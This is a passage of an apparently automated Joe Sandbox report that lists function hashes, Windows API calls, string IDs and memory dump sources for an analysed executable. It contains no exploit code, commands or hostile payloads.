                                                        • Opcode Fuzzy Hash: fdf7fba56cf0b327322f638254b73d498613de115c2495db529360746aa1fb94
                                                        • Instruction Fuzzy Hash: A0F0E754B0960787FF55BE63EDD12B5B3946F88B80F8858358B2EC63D1EE2CE58142B4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00007FF7F4D6647C: FindFirstFileW.KERNELBASE ref: 00007FF7F4D664CB
                                                          • Part of subcall function 00007FF7F4D6647C: FindFirstFileW.KERNELBASE ref: 00007FF7F4D6651E
                                                          • Part of subcall function 00007FF7F4D6647C: GetLastError.KERNEL32 ref: 00007FF7F4D6656F
                                                        • FindClose.KERNELBASE(?,?,?,00007FF7F4D6FF61), ref: 00007FF7F4D662BD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: Find$FileFirst$CloseErrorLast
                                                        • String ID:
                                                        • API String ID: 1464966427-0
                                                        • Opcode ID: 3b96e4bc9674b0bfe861db3a8d48e59cac22d33fe6a98766aeed1da261f7cc18
                                                        • Instruction ID: c0cf74622f3e7a52c131ea54654bc0d0e94a0bca1ad78c3a892a1dbc18fccdcb
                                                        • Opcode Fuzzy Hash: 3b96e4bc9674b0bfe861db3a8d48e59cac22d33fe6a98766aeed1da261f7cc18
                                                        • Instruction Fuzzy Hash: 89F0F462908641D6EB10BF76E084178B7609F1ABB4F540335DB7C073CBCE18D484CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 3ac92b40718cceacc9b69195e34be5c37b2d5e73e97622ec344ecda480175592
                                                        • Instruction ID: 4a622917e394fc4ddc03276362817047434b3690f868e5fa3da3c6636e805499
                                                        • Instruction Fuzzy Hash: 77F0D410B0924787FB667E63FD81675B2805F88BA0F8806349B7EC62C1DE2CE48182B4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF7F4D6427E), ref: 00007FF7F4D642F6
                                                        Similarity
                                                        • API ID: ChangeCloseFindNotification
                                                        • String ID:
                                                        • API String ID: 2591292051-0
                                                        • Opcode ID: 9c850ec0e91a3c36dd67a082f4f7d32c48f886c19389c1b26b24c46edd12351b
                                                        • Instruction ID: 40a6d5e793fbb47866d9cca252424f572258f0feae9108b54ff618e0c32bfa43
                                                        • Instruction Fuzzy Hash: 9DF0A422A48A46E6FF24DF26E481379B660EB04F79F895334D73C011D4DF28D8D583A4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Similarity
                                                        • API ID: ItemMessageSend
                                                        • String ID:
                                                        • API String ID: 3015471070-0
                                                        • Opcode ID: 0d82525fd53c5026d2e0a34595dcb8d2fac7aee2738dc896d465c8e25a7063b1
                                                        • Instruction ID: 888352b280138e009982082ca56094ac0edc234bc9cdf0fd92ef6db6fb2f4ed7
                                                        • Instruction Fuzzy Hash: 54D05E51F2964283E724BF13E499739A3107B96B84F900231CB5E1ABD1DE2DE21257D4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Similarity
                                                        • API ID: CurrentDirectory
                                                        • String ID:
                                                        • API String ID: 1611563598-0
                                                        • Opcode ID: b7b94b84bc736c81f561ac6a0213732948c79a519d47e0e60c8097fcab4ddeb2
                                                        • Instruction ID: a78b9df928f09a9df00897874eb6c95b090df1c32100074f9a3fb09e694972ea
                                                        • Instruction Fuzzy Hash: 50C08C20F02A02C3DB08AF27DCC911822A0BB91F04FA08034D31CC11A0DE2CC4EA87A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Similarity
                                                        • API ID: File
                                                        • String ID:
                                                        • API String ID: 749574446-0
                                                        • Opcode ID: 18013ed5b6161e60d067ba1f4f2b62e7c051905d9142b67b1a2e10f00f48d8d5
                                                        • Instruction ID: f1f14e4f4862ca50e3450f4c57accc3929e170b2581368d9949e3209c3544f75
                                                        • Instruction Fuzzy Hash: 0EB09210B03545C2D704AB23DCC21186325BB89B41BD94430C61DD1260DE1CC8EB9700
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastLoadString$Concurrency::cancel_current_taskInit_thread_footer
                                                        • String ID: %ls$%s: %s
                                                        • API String ID: 2539828978-2259941744
                                                        • Opcode ID: 8509f953a3f888072089c06e54905e895ae12183c162526f6ecee7f108d2818a
                                                        • Instruction ID: eeaf8d85137bf525f1e9d53041e441ab017b1d408b5032090d1fa23e20fe07b6
                                                        • Instruction Fuzzy Hash: 93B2A562A19A8293EB14BF26D4D41BEF315FFC5790F80423AE7AD437D6EE2CD5408690
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfomemcpy_s
                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                        • API String ID: 1759834784-2761157908
                                                        • Opcode ID: 8c7d82894d3eb9af29d7ef01237fe728618e392c192ac46bfd7fd60c8d4d3354
                                                        • Instruction ID: 6729a88cfdb88ab886ed91f7747c6ff8043c339f6b9e6eafc3161d6b15fbb143
                                                        • Instruction Fuzzy Hash: 2CB20B72A081828BE765AE66DC906FDB791FB4438CF905135DB2997BC4DF38E504CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Similarity
                                                        • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
                                                        • String ID:
                                                        • API String ID: 1693479884-0
                                                        • Opcode ID: ea4125342bd4bac1772d1d8899cdb601593b7fbe57cae896892b32ae53872223
                                                        • Instruction ID: a9853cdfad1140a9d804597ddb10eee05615126720068d3c607db080dfb98d4b
                                                        • Instruction Fuzzy Hash: E7A1A062F15A5696FF00AF7AD8A45BDB321AB44BE4B905231DF3D17BC9DE3CE0418290
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: b19f735c2fc22cb40e9aa071b726c9969eab177a3aaad958e6e5f50a2ca54230
                                                        • Instruction ID: c49e9d654bb09d71c79a5c1d5600d4ecd20b6f25589b0b278cb98d911a19135b
                                                        • Instruction Fuzzy Hash: A3315E72609B858AEB60AF66E8803EDB364FB44758F844039DB5D47BD9DF38C548C760
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: 91f6c71151a94394cd8503301a90eeb37f847c0064739d62fe8d487df189b3c5
                                                        • Instruction ID: e1eb004ac6c399c338c7bd7b48e33141ffe139aae68984ab1841c047fc4eb3f4
                                                        • Instruction Fuzzy Hash: 6A318336608B8586DB24DF26E8802BEB3A4FB84754F900135EBAD43BA5DF3CC545CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F4D92F14
                                                          • Part of subcall function 00007FF7F4D8AE84: GetCurrentProcess.KERNEL32(00007FF7F4D9411D), ref: 00007FF7F4D8AEB1
                                                        Similarity
                                                        • API ID: CurrentProcess_invalid_parameter_noinfo
                                                        • String ID: *?$.
                                                        • API String ID: 2518042432-3972193922
                                                        • Opcode ID: 0397e87bc1f9fe8d1eb93a7313c01eb3b20dabc7e7d4e6101e5a9de111c5d93d
                                                        • Instruction ID: d56ae510ba437c42d410cd6a7df86e43c56138ec618b76dbef4c24311661945f
                                                        • Instruction Fuzzy Hash: AB51C262B1569546FB11EF63D8804B9B7A4FB48BD8B844532EF2D57BC5DE3CD0418360
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Similarity
                                                        • API ID: memcpy_s
                                                        • String ID:
                                                        • API String ID: 1502251526-0
                                                        • Opcode ID: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                        • Instruction ID: da8ea6922841f073f92cc34a1e2faedec029532ea57241b79a126adb9e0f7354
                                                        • Instruction Fuzzy Hash: C2D1F533B1928687EB74DF16E5D466AB7A1F788784F948134CB5E97B84DA3CE801CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF7F4D6FD0F), ref: 00007FF7F4D63C05
                                                        • FormatMessageW.KERNEL32(?,?,?,?,?,?,00000000,00007FF7F4D6FD0F), ref: 00007FF7F4D63C39
                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,00007FF7F4D6FD0F), ref: 00007FF7F4D63C63
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: ErrorFormatFreeLastLocalMessage
                                                        • String ID:
                                                        • API String ID: 1365068426-0
                                                        • Opcode ID: 40584bd50e56abfa42d30d5238e6f3c450c42cf4bf47e2a503ba7e13edba453c
                                                        • Instruction ID: 6c8accfad9eab14ba98d04340be145758b08a493909c52ec7034b814bcefc283
                                                        • Opcode Fuzzy Hash: 40584bd50e56abfa42d30d5238e6f3c450c42cf4bf47e2a503ba7e13edba453c
                                                        • Instruction Fuzzy Hash: B1012171709B4693D710AF17F8C017AB391BB8ABC0F854034EBAD86B85CE3CD5148750
                                                        Uniqueness
                                                        • Uniqueness Score: -1.00%
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .
                                                        • API String ID: 0-248832578
                                                        • Opcode ID: da297268851f0dad731dc14ad2341fe3f8b0674bdc4fe7056fefc165238299ef
                                                        • Instruction ID: 33c7654a82531f1a0c8fe05805adb3c4183696a01a6f78024d22b43a1c1020b6
                                                        • Opcode Fuzzy Hash: da297268851f0dad731dc14ad2341fe3f8b0674bdc4fe7056fefc165238299ef
                                                        • Instruction Fuzzy Hash: 3C31C522B1869546EB20AE63EC457A9BA91AB48BE4F848635DF7C47BD5CE3CD5018340
                                                        Uniqueness
                                                        • Uniqueness Score: -1.00%
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: ExceptionRaise_clrfp
                                                        • String ID:
                                                        • API String ID: 15204871-0
                                                        • Opcode ID: 06edcf5cf4dff743b823cf551a0825fa65dd09d8c660a7c3592381f100fbb939
                                                        • Instruction ID: 7c165986373f25d000abbbf2ce36cc844954e2ca12aca8bd379a35b9c76069f7
                                                        • Opcode Fuzzy Hash: 06edcf5cf4dff743b823cf551a0825fa65dd09d8c660a7c3592381f100fbb939
                                                        • Instruction Fuzzy Hash: B6B14873604B888BEB19DF2AC8863687BA0F744B8CF558971DB6D837A8CB39D451C750
                                                        Uniqueness
                                                        • Uniqueness Score: -1.00%
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: ObjectRelease$CapsDevice
                                                        • String ID:
                                                        • API String ID: 1061551593-0
                                                        • Opcode ID: ff042b815f02e026fc3a69f6fa17aa22f2e26b04c76e1e8886377e325206ff29
                                                        • Instruction ID: caeef4e789d4df9b6e09f25b4c5ece789aa62add1d85a2973f1864268dce5897
                                                        • Opcode Fuzzy Hash: ff042b815f02e026fc3a69f6fa17aa22f2e26b04c76e1e8886377e325206ff29
                                                        • Instruction Fuzzy Hash: CF812B26B18A598AEB10DF66D8806ADB771FB88F88B804136DF1D577A4DF3CD105C790
                                                        Uniqueness
                                                        • Uniqueness Score: -1.00%
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: FormatInfoLocaleNumber
                                                        • String ID:
                                                        • API String ID: 2169056816-0
                                                        • Opcode ID: c5aacc7d3bf90c30aa8a4618c48231a2257dd42d29752bb85db0feb902625d90
                                                        • Instruction ID: 303928d1bbf6a2ff854c9fd05737a2b5c757df51480d21cb3730a05d136a1bf9
                                                        • Opcode Fuzzy Hash: c5aacc7d3bf90c30aa8a4618c48231a2257dd42d29752bb85db0feb902625d90
                                                        • Instruction Fuzzy Hash: 36111D62A18B8596E721AF22F8903E9B361FF88B44F844135DB5D037A9DF3CD245C794
                                                        Uniqueness
                                                        • Uniqueness Score: -1.00%
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: Version
                                                        • String ID:
                                                        • API String ID: 1889659487-0
                                                        • Opcode ID: 4077126cdc8ab987fc50741f9daa8f64bdc94cd5a3d95bfaac1a76796dfe440a
                                                        • Instruction ID: bc3b2e1068c12707358b0b16fd9fe7ef9fad2b5a54e4dba50c41ac9a3d31dfa6
                                                        • Opcode Fuzzy Hash: 4077126cdc8ab987fc50741f9daa8f64bdc94cd5a3d95bfaac1a76796dfe440a
                                                        • Instruction Fuzzy Hash: 8E01297AA089429BE724AF06E890375B3A1FB98710F900235D7AE427D4DF3CE5058E60
                                                        Uniqueness
                                                        • Uniqueness Score: -1.00%
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: 0
                                                        • API String ID: 3215553584-4108050209
                                                        • Opcode ID: 8a078738266dd42ed559e37769a38083d9671446fa6f8f15044a9e5823959058
                                                        • Instruction ID: bae754a41957c42bb5761a5084646e8fb189947ae4bc3fcfdd5e97f87ad2f09b
                                                        • Opcode Fuzzy Hash: 8a078738266dd42ed559e37769a38083d9671446fa6f8f15044a9e5823959058
                                                        • Instruction Fuzzy Hash: AF81A122A18242C7EBA4AE17C4C067DB2E1BB41FC4F941531DF29977D9CE2DE84696E0
                                                        Uniqueness
                                                        • Uniqueness Score: -1.00%
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: 0
                                                        • API String ID: 3215553584-4108050209
                                                        • Opcode ID: db1fee231e5625b661d99c0bb1e1601d32928d345e8b8bd10099f265d6b394a5
                                                        • Instruction ID: 0e7bfa9ae6c89d13faff2d32456e3af58c43976128ce0747d249097bb1d193e6
                                                        • Opcode Fuzzy Hash: db1fee231e5625b661d99c0bb1e1601d32928d345e8b8bd10099f265d6b394a5
                                                        • Instruction Fuzzy Hash: 8971D321A196424BE7656E17D0C027DF390BF41B44F941536FF288B6DACF2EE8468BE1
                                                        Uniqueness
                                                        • Uniqueness Score: -1.00%
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @
                                                        • API String ID: 0-2766056989
                                                        • Opcode ID: d46d2d3bf678a46395eb5f5669d2d3d1460b5a19965d13b7a0c752fab2dc10ff
                                                        • Instruction ID: 098bb5064ab4d0d2ce0f56392aa5ee165ed1f31157f21a46028eb9cf65c6e1eb
                                                        • Opcode Fuzzy Hash: d46d2d3bf678a46395eb5f5669d2d3d1460b5a19965d13b7a0c752fab2dc10ff
                                                        • Instruction Fuzzy Hash: 4D418C32714A4586EF04AF2AD8942A9B3A1F758FD4B89A036DF5D87795EE3CD141C340
                                                        Uniqueness
                                                        • Uniqueness Score: -1.00%
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: HeapProcess
                                                        • String ID:
                                                        • API String ID: 54951025-0
                                                        • Opcode ID: fb17e31c4336a6e786549368164ea907063e7b7d29ca402ec9a733d541c9e3a8
                                                        • Instruction ID: e23d419409d15eb8b5460699de29409e0b83e54b0974300c9af1701d9e48b39d
                                                        • Opcode Fuzzy Hash: fb17e31c4336a6e786549368164ea907063e7b7d29ca402ec9a733d541c9e3a8
                                                        • Instruction Fuzzy Hash: A0B09220E07A0AC7EB083F12BCC221872A8BF48B01FD58039C25C813A0DE2C60A58BA0
                                                        Uniqueness
                                                        • Uniqueness Score: -1.00%
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 43769c6bae4104b0ec7f69f72cb22ead7c75c3f90e791b6b37d14b87d96b02d3
                                                        • Instruction ID: 29120d04e1ccad1bb81a06c6b7b9802640718c08792f965291f3605917db2fa8
                                                        • Opcode Fuzzy Hash: 43769c6bae4104b0ec7f69f72cb22ead7c75c3f90e791b6b37d14b87d96b02d3
                                                        • Instruction Fuzzy Hash: 67220673B246508BD728CF26D89AE5E3766F798744B4B8228DF0ACB785DB38D505CB40
                                                        Uniqueness
                                                        • Uniqueness Score: -1.00%
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
